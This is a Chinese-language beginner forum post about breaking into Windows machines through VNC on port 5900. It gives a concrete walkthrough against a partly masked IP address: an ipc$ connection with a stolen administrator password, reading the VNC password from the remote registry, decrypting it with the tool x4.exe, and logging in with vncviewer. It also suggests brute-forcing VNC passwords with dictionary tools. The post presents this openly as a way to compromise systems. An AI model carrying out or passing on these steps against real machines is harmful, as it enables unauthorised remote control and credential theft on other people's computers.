论坛: 菜鸟乐园 标题: 令人忽略的5900端口 复制本贴地址    
作者: toby57 [toby57]    论坛用户   登录
令人忽略的5900端口


首先把5900端口加进你常用的扫描器.

nt服务器的远程管理(所谓hack,就是去远程管理嘛),基于GUI的通常是win的终端连接(3389),pcanywhere(5631),还有就是vnc(5900),让我们来熟悉一下它.

VNC――Virtual Network Computing(即虚拟网络计算机系统)是由AT&T开发的各种操作系统之间的相互操作管理系统,使用VNC可以使你在不同的计算机之间实现真正的相互操作,不过,VNC只限于GUI之间的相互操作,如Windows同Linux系统的X Window之间相互操作,Windows同Macintosh之间的相互操作等,它可以安装在Windows中而让使用者在远端遥控自己的电脑,就算是遥控不同的操作平台也没有问题.

如果你使用的Linux系统,甚至可以用浏览器控制开了VNC服务的机器,如果你是用的win系统,你需要一个VNC的客户端连接器vncviewer.exe.

然而VNC的认证特别简单,它只通过简单的口令认证即允许用户全权操作远端的计算机,更可怕的是,VNC的密码就存储在注册表里,读出Registry的值后经过简单的解密,就能让VNC的密码显原形.一个叫Phenoelit的外国人写了一个解密程序x4.exe,他的网站http://www.phenoelit.de/还有些好东西,大家可以去看看.

现在来举个例子:我拿到了209.61.*.*的管理员administator的密码是7nt,它开了VNC服务(5900端口),现在开始:
1)net use \\209.61.*.*\ipc$ "7nt" /user:"administrator"
先和它做ipc$连接.(如果它没有开ipc$,你可以上传一个reg.exe去读它的Registry的值)
2)打开你的注册表,连接网络注册表(209.61.*.*),通常VNC的密码是在:\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password 读出他的值是:f1 ad 32 63 f5 ed 3e d7
3)在cmd下运行x4.exe,输入x4.exe -W回车,注意W要大写,然后输一个值回一次车,直到输完8个值,看看密码出来了:7ntok
4)用vncviewer.exe连过去看看吧,哈.

如果你还没有拿到对方管理员密码,也还有些软件可以挂字典暴破VNC的密码,速度还行,象scanarator,不过一般VNC的密码都较复杂,至少又多了一种攻破系统的方法和希望吧.

我以上提到的软件在小凤居有下载.
:):)



地主 发表时间: 05-03-19 13:55

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号